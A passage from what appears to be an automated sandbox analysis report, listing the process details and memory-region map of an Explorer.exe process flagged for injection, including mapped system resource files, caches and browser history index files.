= "0x800000" monitor_reason = "injection" parent_id = "2" os_parent_pid = "0xffffffffffffffff" cmd_line = "C:\\Windows\\Explorer.EXE" cur_dir = "C:\\Windows\\system32\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e771" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 380 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 381 start_va = 0x20000 end_va = 0x21fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 382 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 383 start_va = 0x40000 end_va = 0x41fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 384 start_va = 0x50000 end_va = 0xb6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 385 start_va = 0xc0000 end_va = 0xc5fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "explorer.exe.mui" filename = "\\Windows\\en-US\\explorer.exe.mui" (normalized: "c:\\windows\\en-us\\explorer.exe.mui") Region: id = 386 start_va = 0xd0000 end_va = 0xd0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 387 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 388 start_va = 0xf0000 end_va = 0xfcfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "setupapi.dll.mui" filename = "\\Windows\\System32\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\setupapi.dll.mui") Region: id = 389 start_va = 0x100000 end_va = 0x10ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 390 start_va = 0x110000 end_va = 0x20ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 391 start_va = 0x210000 end_va = 0x28ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 392 start_va = 0x290000 end_va = 0x2cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 393 start_va = 0x2d0000 end_va = 0x2d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 394 start_va = 0x2e0000 end_va = 0x3befff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 395 start_va = 0x3c0000 end_va = 0x3c1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Region: id = 396 start_va = 0x3d0000 end_va = 0x3d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 397 start_va = 0x3e0000 end_va = 0x4dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 398 start_va = 0x4e0000 end_va = 0x667fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 399 start_va = 0x670000 end_va = 0x7f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 400 start_va = 0x800000 end_va = 0x1bfffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000800000" filename = "" Region: id = 401 start_va = 0x1c00000 end_va = 0x1c01fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c00000" filename = "" Region: id = 402 start_va = 0x1c10000 end_va = 0x1c29fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c10000" filename = "" Region: id = 403 start_va = 0x1c30000 end_va = 0x1c30fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c30000" filename = "" Region: id = 404 start_va = 0x1c40000 end_va = 0x1c40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c40000" filename = "" Region: id = 405 start_va = 0x1c50000 end_va = 0x1c61fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c50000" filename = "" Region: id = 406 start_va = 0x1c70000 end_va = 0x1c72fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001c70000" filename = "" Region: id = 407 start_va = 0x1c80000 end_va = 0x1c80fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c80000" filename = "" Region: id = 408 start_va = 0x1c90000 end_va = 0x1c90fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c90000" filename = "" Region: id = 409 start_va = 0x1ca0000 end_va = 0x1ca1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ca0000" filename = "" Region: id = 410 start_va = 0x1cb0000 end_va = 0x1cb1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001cb0000" filename = "" Region: id = 411 start_va = 0x1cc0000 end_va = 0x1d3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001cc0000" filename = "" Region: id = 412 start_va = 0x1d40000 end_va = 0x1d41fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001d40000" filename = "" Region: id = 413 start_va = 0x1d50000 end_va = 0x1d52fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "comctl32.dll.mui" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.c..-controls.resources_6595b64144ccf1df_6.0.7600.16385_en-us_106f9be843a9b4e3\\comctl32.dll.mui" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.c..-controls.resources_6595b64144ccf1df_6.0.7600.16385_en-us_106f9be843a9b4e3\\comctl32.dll.mui") Region: id = 414 start_va = 0x1d60000 end_va = 0x1d60fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d60000" filename = "" Region: id = 415 start_va = 0x1d70000 end_va = 0x1deffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d70000" filename = "" Region: id = 416 start_va = 0x1df0000 end_va = 0x20befff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 417 start_va = 0x20c0000 end_va = 0x211bfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "shell32.dll.mui" filename = "\\Windows\\System32\\en-US\\shell32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\shell32.dll.mui") Region: id = 418 start_va = 0x2120000 end_va = 0x2125fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002120000" filename = "" Region: id = 419 start_va = 0x2130000 end_va = 0x2130fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002130000" filename = "" Region: id = 420 start_va = 0x2140000 end_va = 0x2148fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002140000" filename = "" Region: id = 421 start_va = 0x2150000 end_va = 0x2157fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002150000" filename = "" Region: id = 422 start_va = 0x2160000 end_va = 0x2176fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000007.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000007.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000007.db") Region: id = 423 start_va = 0x2180000 end_va = 0x2180fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002180000" filename = "" Region: id = 424 start_va = 0x2190000 end_va = 0x2193fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 425 start_va = 0x21a0000 end_va = 0x21a3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 426 start_va = 0x21b0000 end_va = 0x21b1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000021b0000" filename = "" Region: id = 427 start_va = 0x21c0000 end_va = 0x221ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021c0000" filename = "" Region: id = 428 start_va = 0x2220000 end_va = 0x229dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002220000" filename = "" Region: id = 429 start_va = 0x22a0000 end_va = 0x239ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000022a0000" filename = "" Region: id = 430 start_va = 0x23a0000 end_va = 0x23cffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000e.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000000e.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000e.db") Region: id = 431 start_va = 0x23d0000 end_va = 0x23d4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "explorerframe.dll.mui" filename = "\\Windows\\System32\\en-US\\explorerframe.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\explorerframe.dll.mui") Region: id = 432 start_va = 0x23e0000 end_va = 0x23e3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023e0000" filename = "" Region: id = 433 start_va = 0x23f0000 end_va = 0x23f3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023f0000" filename = "" Region: id = 434 start_va = 0x2400000 end_va = 0x2400fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002400000" filename = "" Region: id = 435 start_va = 0x2410000 end_va = 0x2410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002410000" filename = "" Region: id = 436 start_va = 0x2420000 end_va = 0x2421fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002420000" filename = "" Region: id = 437 start_va = 0x2430000 end_va = 0x2433fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002430000" filename = "" Region: id = 438 start_va = 0x2440000 end_va = 0x2440fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mpr.dll.mui" filename = "\\Windows\\System32\\en-US\\mpr.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\mpr.dll.mui") Region: id = 439 start_va = 0x2450000 end_va = 0x2450fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002450000" filename = "" Region: id = 440 start_va = 0x2460000 end_va = 0x2460fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002460000" filename = "" Region: id = 441 start_va = 0x2470000 end_va = 0x247efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wscui.cpl.mui" filename = "\\Windows\\System32\\en-US\\wscui.cpl.mui" (normalized: "c:\\windows\\system32\\en-us\\wscui.cpl.mui") Region: id = 442 start_va = 0x2480000 end_va = 0x257ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002480000" filename = "" Region: id = 443 start_va = 0x2580000 end_va = 0x2580fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_1024.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_1024.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_1024.db") Region: id = 444 start_va = 0x2590000 end_va = 0x2591fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 445 start_va = 0x25a0000 end_va = 0x25affff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat") Region: id = 446 start_va = 0x25b0000 end_va = 0x25b7fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat") Region: id = 447 start_va = 0x25c0000 end_va = 0x25cffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat") Region: id = 448 start_va = 0x25d0000 end_va = 0x25d7fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "urlmon.dll.mui" filename = "\\Windows\\System32\\en-US\\urlmon.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\urlmon.dll.mui") Region: id = 449 start_va = 0x25e0000 end_va = 0x25e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025e0000" filename = "" Region: id = 450 start_va = 0x25f0000 end_va = 0x25fffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012021120220211203\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\mshist012021120220211203\\index.dat") Region: id = 451 start_va = 0x2600000 end_va = 0x2601fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 452 start_va = 0x2610000 end_va = 0x2610fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll.mui" filename = "\\Windows\\System32\\en-US\\imageres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\imageres.dll.mui") Region: id = 453 start_va = 0x2620000 end_va = 0x274ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ieframe.dll.mui" filename = "\\Windows\\System32\\en-US\\ieframe.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\ieframe.dll.mui") Region: id = 454 start_va = 0x2750000 end_va = 0x2750fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_sr.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_sr.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_sr.db") Region: id = 455 start_va = 0x2760000 end_va = 0x2761fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 456 start_va = 0x2770000 end_va = 0x2771fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 457 start_va = 0x2780000 end_va = 0x2781fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002780000" filename = "" Region: id = 458 start_va = 0x2790000 end_va = 0x2791fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "stobject.dll.mui" filename = "\\Windows\\System32\\en-US\\stobject.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\stobject.dll.mui") Region: id = 459 start_va = 0x27a0000 end_va = 0x27a4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000027a0000" filename = "" Region: id = 460 start_va = 0x27b0000 end_va = 0x27b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000027b0000" filename = "" Region: id = 461 start_va = 0x27c0000 end_va = 0x27c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000027c0000" filename = "" Region: id = 462 start_va = 0x27d0000 end_va = 0x27d1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000027d0000" filename = "" Region: id = 463 start_va = 0x27e0000 end_va = 0x27e0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "hcproviders.dll.mui" filename = "\\Windows\\System32\\en-US\\hcproviders.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\hcproviders.dll.mui") Region: id = 464 start_va = 0x27f0000 end_va = 0x27f4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "actioncenter.dll.mui" filename = "\\Windows\\System32\\en-US\\ActionCenter.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\actioncenter.dll.mui") Region: id = 465 start_va = 0x2800000 end_va = 0x2830fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002800000" filename = "" Region: id = 466 start_va = 0x2840000 end_va = 0x2843fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002840000" filename = "" Region: id = 467 start_va = 0x2850000 end_va = 0x2850fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002850000" filename = "" Region: id = 468 start_va = 0x2860000 end_va = 0x2860fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002860000" filename = "" Region: id = 469 start_va = 0x2870000 end_va = 0x2870fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002870000" filename = "" Region: id = 470 start_va = 0x2880000 end_va = 0x2880fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002880000" filename = "" Region: id = 471 start_va = 0x2890000 end_va = 0x290ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002890000" filename = "" Region: id = 472 start_va = 0x2910000 end_va = 0x291ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002910000" filename = "" Region: id = 473 start_va = 0x2920000 end_va = 0x2930fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "netshell.dll.mui" filename = "\\Windows\\System32\\en-US\\netshell.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\netshell.dll.mui") Region: id = 474 start_va = 0x2940000 end_va = 0x2940fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_1024.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_1024.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_1024.db") Region: id = 475 start_va = 0x2950000 end_va = 0x2950fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_sr.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_sr.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_sr.db") Region: id = 476 start_va = 0x2960000 end_va = 0x2960fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_1024.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_1024.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_1024.db") Region: id = 477 start_va = 0x2970000 end_va = 0x2970fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_1024.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_1024.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_1024.db") Region: id = 478 start_va = 0x2980000 end_va = 0x2980fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_sr.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_sr.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_sr.db") Region: id = 479 start_va = 0x2990000 end_va = 0x2990fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002990000" filename = "" Region: id = 480 start_va = 0x29a0000 end_va = 0x29a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029a0000" filename = "" Region: id = 481 start_va = 0x29b0000 end_va = 0x29b1fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 482 start_va = 0x29c0000 end_va = 0x29c1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000029c0000" filename = "" Region: id = 483 start_va = 0x29d0000 end_va = 0x29d6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "authui.dll.mui" filename = "\\Windows\\System32\\en-US\\authui.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\authui.dll.mui") Region: id = 484 start_va = 0x29e0000 end_va = 0x29edfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "propsys.dll.mui" filename = "\\Windows\\System32\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\propsys.dll.mui") Region: id = 485 start_va = 0x29f0000 end_va = 0x2a6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 486 start_va = 0x2a70000 end_va = 0x2ad5fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db") Region: id = 487 start_va = 0x2ae0000 end_va = 0x2ae0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ae0000" filename = "" Region: id = 488 start_va = 0x2af0000 end_va = 0x2b6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002af0000" filename = "" Region: id = 489 start_va = 0x2b70000 end_va = 0x2b71fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002b70000" filename = "" Region: id = 490 start_va = 0x2b80000 end_va = 0x2b81fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002b80000" filename = "" Region: id = 491 start_va = 0x2b90000 end_va = 0x2b93fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 492 start_va = 0x2ba0000 end_va = 0x2ba0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ba0000" filename = "" Region: id = 493 start_va = 0x2bb0000 end_va = 0x2bb0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sndvolsso.dll.mui" filename = "\\Windows\\System32\\en-US\\sndvolsso.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\sndvolsso.dll.mui") Region: id = 494 start_va = 0x2bc0000 end_va = 0x2bc1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002bc0000" filename = "" Region: id = 495 start_va = 0x2bd0000 end_va = 0x2bd1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002bd0000" filename = "" Region: id = 496 start_va = 0x2be0000 end_va = 0x2be3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 497 start_va = 0x2bf0000 end_va = 0x2bf0fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{40fc8d7d-05ed-4feb-b03b-6c100659ef5c}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{40FC8D7D-05ED-4FEB-B03B-6C100659EF5C}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{40fc8d7d-05ed-4feb-b03b-6c100659ef5c}.2.ver0x0000000000000001.db") Region: id = 498 start_va = 0x2c00000 end_va = 0x2c03fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 499 start_va = 0x2c10000 end_va = 0x2c10fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{228385d3-b646-481b-b0de-f0c3a58f5423}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{228385D3-B646-481B-B0DE-F0C3A58F5423}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{228385d3-b646-481b-b0de-f0c3a58f5423}.2.ver0x0000000000000001.db") Region: id = 500 start_va = 0x2c20000 end_va = 0x2c23fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 501 start_va = 0x2c30000 end_va = 0x2c30fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{87178f01-581a-45f0-9991-3f918faa83f1}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{87178F01-581A-45F0-9991-3F918FAA83F1}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{87178f01-581a-45f0-9991-3f918faa83f1}.2.ver0x0000000000000001.db") Region: id = 502 start_va = 0x2c40000 end_va = 0x2cbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002c40000" filename = "" Region: id = 503 start_va = 0x2cc0000 end_va = 0x35effff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 504 start_va = 0x35f0000 end_va = 0x35f3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 505 start_va = 0x3600000 end_va = 0x3600fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{c353f91e-d25f-48f0-a2cd-9f60b2681e9a}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{C353F91E-D25F-48F0-A2CD-9F60B2681E9A}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{c353f91e-d25f-48f0-a2cd-9f60b2681e9a}.2.ver0x0000000000000001.db") Region: id = 506 start_va = 0x3610000 end_va = 0x3613fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 507 start_va = 0x3620000 end_va = 0x3620fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{2f368d22-02bf-4413-97d1-c886cb140911}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{2F368D22-02BF-4413-97D1-C886CB140911}.2.ver0x0000000000000001.db" (normalized: 